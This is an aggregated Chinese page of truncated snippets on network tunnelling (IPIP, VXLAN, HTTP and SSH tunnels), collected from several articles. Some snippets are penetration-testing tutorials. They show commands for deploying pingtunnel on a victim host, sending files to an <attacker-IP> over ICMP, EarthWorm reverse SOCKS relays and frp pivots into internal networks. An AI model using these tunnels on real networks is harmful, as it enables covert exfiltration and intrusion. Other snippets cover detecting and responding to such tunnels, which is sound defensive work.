# 简介 IPIP隧道是一种点对点的隧道协议,用于在IPv4网络上传输IPv4或IPv6数据包。...IPIP隧道的工作原理是将源主机的IP数据包封装在一个新的IP数据包中,新的IP数据包的目的地址是隧道的另一端。在隧道的另一端,接收方将解封装原始IP数据包,并将其传递到目标主机。...IPIP隧道可以在不同的网络之间建立连接,例如在IPv4网络和IPv6网络之间建立连接。...# 使用IPIP隧道实现跨主机网络 首先在Node1创建tun设备并设置为ipip模式,local设置为本地IP地址10.65.132.187,remote设置为对端IP10.65.132.187,这两个是隧道外层...IPIP隧道是通过IP地址来标识网络设备的,所以不需要使用MAC地址,直接通过IP地址即可。通过查看tun设备信息,可以看到其是不存在mac地址的。
写在前面 博文内容为 Linux 隧道通信 IPIP认知 内容涉及:ipip 介绍,一个 ipip 通信 Demo 以及数据帧流转分析 理解不足小伙伴帮忙指正 某些人和事,哪怕没有缘分,是路边的风景,可是只要看一眼...tun表示虚拟的点对点设备,工作在L3,之所以叫这个名字,是因为tun经常被用来做隧道通信(tunnel) 通过命令ip tunnel help查看IP隧道的相关操作。...下面我们以ipip为例,介绍Linux隧道通信的基本原理。...注:Linux L3隧道底层实现原理都基于tun设备 ipip隧道通信 Demo 应为只有一台机器,所以这里我们通过 Linux 上的两个 network namespace 来模拟两个机器节点,每个...Linux 机器 创建tun设备,并设置为ipip隧道 在 ns1 上面创建 tun1 设备:ip tunnel add tunl 设置隧道模式为ipip:mode ipip 设置隧道端点,用remote
IP 隧道 Linux 原生支持多种三层隧道,其底层实现原理都是基于 tun 设备。我们可以通过命令 ip tunnel help 查看 IP 隧道的相关操作。...vti:即虚拟隧道接口(Virtual Tunnel Interface),是 cisco 提出的一种 IPsec 隧道技术。...实践 IPIP 隧道 我们下面以 ipip 作为例子,来实践下 Linux 的隧道通信。本文以前文的 Linux 路由机制作为基础,不清楚 Linux 路由的可以先翻看下那篇文章再来看。...总结 现在的 Linux 内核原生支持 5 种隧道协议,它们底层实现都是采用 tun 虚拟设备。 我们熟知的各种 V** 软件,其底层实现都离不开这 5 种隧道协议。...我们可以把上面的 ipip 改成其他隧道模式,其他不变,同样可以完成不同隧道的实验。
前言:IPIP隧道是一种三层隧道,通过把原来的IP包封装在新的IP包里面,来创建隧道传输。...本篇简单分析Linux(2.6.32版本)中的IPIP隧道的实现过程,期望有所借鉴,造出轮子:-) 一....IPIP的初始化 Linux中的IPIP隧道文件主要分布在tunnel4.c和ipip.c文件中。...因为是三层隧道,在IP报文中填充的三层协议自然就不能是常见的TCP和UDP,所以,Linux抽象了一个隧道层,位置就相当于传输层,主要的实现就是在tunnel4.c中。...可以说在隧道层对隧道协议进行的注册,保证能够识别接收到隧道包。而对隧道包的处理则是在IPIP中完成的。
0x01 简介 大家好,我们是 NOP Team,今天这篇文章要介绍的是如何处置 ICMP/DNS 隧道,处理思路是一致的,但 icmp 更具有代表性,所以下文均以 icmp 隧道视角讲述 在 2024...ip上 我们来处理 icmp 隧道,肯定是安全设备有告警了,那么我们需要获取到icmp隧道的对应的ip或者域名,如果是ip,我们后期在利用 ebpf 的过程中,筛选与该ip通信的icmp流量,之后查找pid...服务端部署 icmp 隧道 server wget https://github.com/esrrhs/pingtunnel/releases/download/2.8/pingtunnel_linux_amd64...受害端执行 icmp 隧道客户端 wget https://github.com/esrrhs/pingtunnel/releases/download/2.8/pingtunnel_linux_amd64...ps -aux 验证一下是不是这样 可以看到, 14990 进程确实为 icmp 隧道的进程,成功找到icmp 隧道 发现进程id后剩下就没什么可说的了,常规处置流程了,至于DNS隧道就不掩饰了,大同小异
源码与分析 (1)icmp_tran.py (2)tran.sh 2、检测与绕过 (1)异常ICMP数据包数量 (2)异常ICMP包长度 (3)payload内容 结语 前言 本文研究ICMP隧道的一个工具...:内网渗透系列:内网隧道之ICMP隧道 3、使用 (1)服务端 tucpdump监听并下载文件 sudo tcpdump -i eth0 icmp and icmp[icmptype]=icmp-echo.../tran.sh (2)客户端 windows icmp_tran.exe linux sudo python icmp_tran.py <attacker-IP...命令: windows系统下ping默认传输的是:abcdefghijklmnopqrstuvwabcdefghi,共32bytes linux系统下,ping默认传输的是48bytes,前8bytes...如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
写在前面 博文内容为 Linux 网络隧道技术 VXLAN 认知,内容涉及: vxlan 协议介绍 vxlan 基本配置命令 基于Linux 网络命名空间的 vxlan 组网 Demo 自维护 VTEP...从整体看,每个 VXLAN 网络像是为通信的虚拟机搭建了一个单独的通信通道,也就是隧道。 VXLAN其实是在三层网络上构建出来的一个二层网络的隧道。...VXLAN 要求 Linux 内核版本在3.7以上,最好为3.9以上,所以在一些旧版本的 Linux 上无法使用基于 VXLAN 的封包技术。...在实际生产中,每台主机上都有几十台甚至上百台虚拟机或者容器需要通信,因此需要找到一种方法将这些通信实体组织起来,再经过隧道口 VTEP 转发出去 Linux 网桥可以连接多块虚拟网卡,因此可以使用网桥把多个虚拟机或者容器放到同一个...在这里插入图片描述 只有一个机器,在使用 Linux 网络命名空间嵌套的方式进行当前实验时,因为嵌套的 Linux network namespace 需要外层 namespace 存在驻留进程,内层的
ICMP隧道简介 ICMP是一个比较特殊的协议,在一般的通信协议里如果两台设备要进行通信,肯定需要开放端口,而在ICMP协议下就不需要,最常见的ICMP消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的...&& make install 工具使用 网络环境: 攻击主机(VPS):192.168.188.129 攻击主机(Windows 10):192.168.188.1 内网边界主机(Kali linux...)的1080端口时,会吧数据库服务器192.168.23.12的3389端口的数据 封装在ICMP隧道里,以Web服务器182.168.188.134为ICMP隧道跳板进行传送 相关参数说明...主机中使用mstsc访问VPS主机(192.168.188.129——>Kali linux)的1080端口: 之后会弹出以下认证界面,填写目标内网主机的RDP登录凭证信息进行登录: 之后可以看到成功连接到内网主机...进行远程连接,此时的ip为边界服务器的ip地址: rdesktop 192.168.188.131:44171 隧道防御 使用ICMP隧道时会产生大量的ICMP数据包,我们可以通过Wireshark进行
内网隐藏通信隧道技术——EW隧道 EarthWorm中的应用 在研究人员的渗透测试中,EW很好用,体积小,Linux为30kb左右,windows为56kb左右。...该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,现在使用人数较多,如果在真实环境下使用,需要免杀 下载地址:https://github.com/idlefire/ew...: 在内网web服务器与外网代理机器之间架设隧道,访问域控 ew_for_Win.exe -s ssocksd -l 9999 执行上述操作,就可以架设一个端口为9999的socks代理,然后可以使用...888 即在公网代理机器上添加一个转接隧道,把1008端口受到的代理请求转发给888端口 在内网机器上执行: ew.exe -s rssocks -d 192.168.27.157 -e 888 即为在...只能访问内网资源,无法访问外网 域控 在代理机器,内网域控,内网web服务器上进行模拟: 先在代理机器上执行: ew -s lcx_listen -l 1080 -e 888 即在公网代理机器中添加转接隧道
启动命令: Windows:frpc.exe -c frpc.ini Linux:./frpc -c ./frpc.ini ....工具使用 「这里linux是公网VPS,作为服务端 windows是内网服务器,作为客户端」 在linux中解压命令: tar zxvf frp_0.37.0_linux_amd64.tar.gz...local_port = 80 #本地端口(根据协议修改) remote_port = 6001 #远程服务器的ip端口 一台Windows和一台Linux建立隧道连接 server_addr = 102.224.185.237...首先在外网vps上启动frps服务,在内网的web服务器与域控之间建立一条frps隧道,内网web服务器启动frps,域控启动frpc服务,相互连接,建立起一条一级代理隧道,此时web服务器就作为跳板了...利用处于内网或防火墙后的机器,对外网环境提供TCP和UDP服务,例如在家里通过SSH访问处于公司内网环境的主机 对于其它穿透隧道工具的不足: Earthworm不能过杀软,秒杀 Tunnel非常不稳定,
介绍 HTTP隧道指的是,“利用HTTP的CONNECT方法在两台网络受限的计算机间建立网络链接,通常一方是在受限网络的内部,一方在外部,借外部方来代理内部方的流量”。...该隧道由中间的“代理服务器”创建,通常部署于“DMZ”区域。 在隧道中可以传输一些被限制的协议,最终借由“代理服务器”跳出受限网络。...# 以下来自服务器的数据 HTTP/1.1 200 OK ... ---- 非CONNECT方法建立HTTP隧道 建立HTTP隧道可以是任何方法,它只是一种思想,而CONNECT是最为常见的方式而已...建立HTTP隧道的场景中,“客户端”部署在保护(受限)网络的内部,而“代理”则部署在外部。...---- 代理认证 这里的“代理认证“指的是”代理“对”客户端“进行身份认证,认证通过后才允许建立HTTP隧道。
我们无法在宿主机中访问服务器中的服务。 但,此时可借助于 ssh 隧道,将服务器端口号映射到宿主机本地,则可以愉快地将服务器作为开发环境了。...ssh -NL 将远程服务器的端口号可在本地进行访问。...映射到本地的 5000 端口,在浏览器中可直接输入 localhost:5000 进行开发调试。...映射到远程服务器的 5000 端口。.../ 作业 我们如何在本地浏览器访问云服务器的 8080 端口
(Icmptunnel) ICMP隧道 ICMP隧道简单实用,是一个比较特殊的协议。...使用ICMP搭建隧道(PingTunnel) PingTunnel是一款常用的ICMP隧道工具,可以跨平台使用,为了避免隧道被滥用,还可以为隧道设置密码。...现在我们获取到了Web服务器的权限,想用ICMP搭建通往内网的隧道,连接内网Windows的3389端口。...使用ICMP搭建隧道(Icmptunnel) 适用场景:目标机器是Linux服务器的情况 攻击机:Redhat7 192.1.68.10.20 靶机:Centos7 192.168.10.13 ICMP...隧道是指将TCP连接通过ICMP包进行隧道传送的一种方法。
简单来讲,VXLAN 是在底层物理网络(underlay)之上使用隧道技术,借助 UDP 层构建的 Overlay 的逻辑网络,使逻辑网络与物理网络解耦,实现灵活的组网需求。...大体思路均是将以太网报文承载到某种隧道层面,差异性在于选择和构造隧道的不同,而底层均是 IP 转发。...GRE 扩展头感知并对 flow ID 进行 HASH,需要硬件升级;STT 对于 TCP 有较大修改,隧道模式接近 UDP 性质,隧道构造技术属于革新性,且复杂度较高,而 VXLAN 利用了现有通用的...Tunnel(VXLAN 隧道) 隧道是一个逻辑上的概念,在 VXLAN 模型中并没有具体的物理实体向对应。...隧道可以看做是一种虚拟通道,VXLAN 通信双方认为自己是在直接通信,并不知道底层网络的存在。从整体来说,每个 VXLAN 网络像是为通信的虚拟机搭建了一个单独的通信通道,也就是隧道。 ?
web隧道 web隧道可以让 HTTP 应用程序访问使用非 HTTP 协议的应用程序。Web 隧道允许用户通过 HTTP 连接发送非 HTTP 流量,这样就可以在 HTTP 上捎带其他协议数据了。...CONNECT方法建立HTTP隧道 Web 隧道是用 HTTP 的 CONNECT 方法建立起来的。...SSL隧道 最初开发 Web 隧道是为了通过防火墙来传输加密的 SSL 流量。很多组织都会将所有流量通过分组过滤路由器和代理服务器以隧道方式传输,以提升安全性。...隧道认证 在适当的情况下,也可以将 HTTP 的其他特性与隧道配合使用。尤其是,可以将代理的认证支持与隧道配合使用,对客户端使用隧道的权利进行认证。...隧道的安全性考虑 总的来说,隧道网关无法验证目前使用的协议是否就是它原本打算经过隧道传输的协议。因此使用隧道的时候要格外小心。 参考资料 《HTTP权威指南》
而隧道代理则是近年来备受推崇的一种代理形式,它通过将请求通过隧道传输,可以有效地隐藏爬虫的真实IP地址,提高爬虫的反爬能力。在选择隧道代理时,我们应该注重以下几个关键条件,以获得一份优质的隧道代理。...一个好的隧道代理提供商应该拥有稳定的服务器和网络基础设施,并能够保证低延迟和高带宽。2. 大规模的代理IP池另外,代理IP池的规模对于隧道代理的选择也非常重要。...高度匿名的代理IP隧道代理的另一个重要特点是高度匿名性。无论是对于网站服务器还是反爬虫机制来说,隧道代理应该能够隐藏爬虫的真实IP地址,避免被识别和封禁。...因此,一个优质的隧道代理应该提供高度匿名的代理IP,确保我们的爬虫能够长时间稳定地运行。4. 良好的价格与服务除了基本的功能外,一个优质的隧道代理服务商还应该提供合理的价格和灵活的服务。...当然,我们也可以根据实际需求使用多个不同的隧道代理服务商,以增加爬虫的灵活性和安全性。希望以上条件能帮助你在选择隧道代理时做出明智的决策。
ICMP隧道小记 一般的通信协议里,如果两台设备之间需要进行通信,肯定是需要开放端口的,但是ICMP协议不需要。...安装Python-impacket库: apt-get install python-impacket 如果出现下图的情况,更新一下服务器中的包即可 如果还是不可以的话,就只能用pip了 pip2...install impacket step 3 配置 因为icmpsh工具要代替系统本身的ping命令的应答程序,所以需要输入如下命令来关闭本地系统的ICMP答应(如果要恢复系统答应,则设置为0),否则...Shell的运行会不稳定。...sysctl -w net.ipv4.icmp_echo_ignore_all=1 隧道利用完记得换回来1改成0就好 step 4 Run .
与同类工具相比,iodine具有如下特点: 不会对下行数据进行编码 支持多平台(Linux、Windows、MacOS) 支持16个并发连接 支持强密码机制 支持同网段隧道IP地质(不同于服务器一客户端网段...) 支持多种DNS记录类型 提供了丰富的隧道质量检测措施 ➪使用iodin搭建隧道 1):部署域名解析 首先,用一台公网的Linux系统的VPS作为C&C服务器,并准备好一个可以配置的域名(这里我们假设是...此时,我们的VPS和客户端处在同一个逻辑的局域网内。 但是此时ping服务端的192.168.100.1地址却ping不通,不知为何,客户端如果是Linux则不会有此情况。...Linux系统 如果是Linux系统,先安装iodine。...| 内网转发工具的使用 内网转发及隐蔽隧道 | FRP的使用 内网转发及隐蔽隧道 | NPS的使用 责编:vivian 来源:谢公子博客
背景 tcp 隧道我们见得比较多了,在 这篇文章 就给了一些来例子,其中有一些 tcp 隧道是用来穿越防火墙,或者 "科学上网"; 但是如果去看这些隧道的实现,本质上都是基于 http 的 connect...方法,具体区别可以看这个 wiki, 即实现其实是使用 http 的连接方法,然后 reuse http 底层的 conncetion,比如 websocket 等也是基于类似的实现 Example...conncetion,这点很重要,如果用 faas 实现,那么 faas 的实例数量要限制为 1(即使用单实例并发,这点 腾讯云的 scf 还没有支持,阿里云已经支持) sequenceDiagram...实现没有使用 connect 方法】 其中 http 的实现主体部分如下(faas 的实现也是类似的,注意代码里面省略了很多,仅仅演示了核心的部分) const Name = "http" type...main.main.func1 (3 handlers) [GIN-debug] Listening and serving HTTP on :8081 打开 google.com, 连接成功, tcp 隧道实现之后可以在上面做更多复杂的功能
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
云直播
对象存储
腾讯会议
